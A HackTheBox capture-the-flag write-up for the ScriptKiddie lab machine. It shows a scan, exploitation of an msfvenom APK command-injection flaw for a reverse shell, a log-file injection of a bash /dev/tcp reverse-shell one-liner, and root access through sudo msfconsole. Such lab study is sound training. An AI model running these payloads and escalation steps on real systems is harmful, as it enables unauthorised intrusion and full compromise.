HackTheBox - ScriptKiddie - Writeup

HackTheBox - ScriptKiddie - Writeup

·

3 min read

Metadata

  • IP: 10.129.95.150

  • Date accessed: 05-10-2021

Scanning

nmap scan

Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-10 15:06 EDT
Nmap scan report for 10.129.95.150
Host is up (0.12s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 703.72 seconds

Ports opened 22, 5000

Logging in to $IP:5000

Enumerating

Using CVE-2020-7384 MsfVenom APK template command injection

msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > show options

Module options (exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.apk          yes       The APK file name


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.106     yes       The listen address (an interface may be specif
                                     ied)
   LPORT  4444             yes       The listen port

   **DisablePayloadHandler: True   (no handler will be created!)**


Exploit target:

   Id  Name
   --  ----
   0   Automatic

LHOST is our tun0

Create a netcat listener on 4444

Upload the apk file as follows:

payload.png

Click Generate and check y netcat listener

got a shell! Run python3 -c 'import pty; pty.spawn("/bin/bash")' to get a stable shell

root@kali-virtualbox:~/GitLab/Offensive-Security/HackTheBox/ScriptKiddie# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.106] from (UNKNOWN) [10.129.95.150] 39088
pwd
/home/kid/html
ls
__pycache__
app.py
static
templates
whoami
kid
python3 -c 'import pty; pty.spawn("/bin/bash")'
kid@scriptkiddie:~/html$ ls
ls
__pycache__  app.py  static  templates
kid@scriptkiddie:~/html$ cd
cd
kid@scriptkiddie:~$ ls
ls
html  logs  snap  user.txt
kid@scriptkiddie:~$ cat user.txt
cat user.txt
dfbc----------------------
kid@scriptkiddie:~$

Looked around and found another user called pwn

kid@scriptkiddie:~/logs$ ls -la
ls -la
total 8
drwxrwxrwx  2 kid kid 4096 Feb  3 07:40 .
drwxr-xr-x 11 kid kid 4096 Feb  3 11:49 ..
-rw-rw-r--  1 kid pwn    0 Feb  3 11:46 hackers

found a .sh file

kid@scriptkiddie:/home/pwn$ ls 
ls
recon  scanlosers.sh
kid@scriptkiddie:/home/pwn$ cat scanlosers.sh
cat scanlosers.sh
#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

Set up another net cat listener

root@kali-virtualbox:~/GitLab/Offensive-Security/HackTheBox/ScriptKiddie# nc -lvp 1337

Run the bash to hopefully get another shell from pwn

kid@scriptkiddie:~/logs$ echo  "  ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.106/1337 0>&1' #" >>hackers

<-i >& /dev/tcp/10.10.14.106/1337 0>&1' #" >>hackers

kid@scriptkiddie:~/logs$

RESULTS~

root@kali-virtualbox:~/GitLab/Offensive-Security/HackTheBox/ScriptKiddie# nc -lvp 1337
listening on [any] 1337 ...
10.129.95.150: inverse host lookup failed: Unknown host
connect to [10.10.14.106] from (UNKNOWN) [10.129.95.150] 38866
bash: cannot set terminal process group (821): Inappropriate ioctl for device
bash: no job control in this shell
pwn@scriptkiddie:~$

I tried running the binary with pwn but nothing happens

tUrns out Pwn has sudo prv to msconsole, so we might be able to get it

pwn@scriptkiddie:~$ ls
ls
recon
scanlosers.sh
pwn@scriptkiddie:~$ ./scanlosers.sh
./scanlosers.sh
pwn@scriptkiddie:~$ sudo -l
sudo -l
Matching Defaults entries for pwn on scriptkiddie:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwn may run the following commands on scriptkiddie:
    (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole
pwn@scriptkiddie:~$

Run bin bash to get shell

msf6 >  /bin/bash
stty: 'standard input': Inappropriate ioctl for device
[*] exec:  /bin/bash

pwd
/home/pwn
whoami
root
ls
recon
scanlosers.sh
cd
ls
root.txt
snap
cat root.txt    
cb04------------------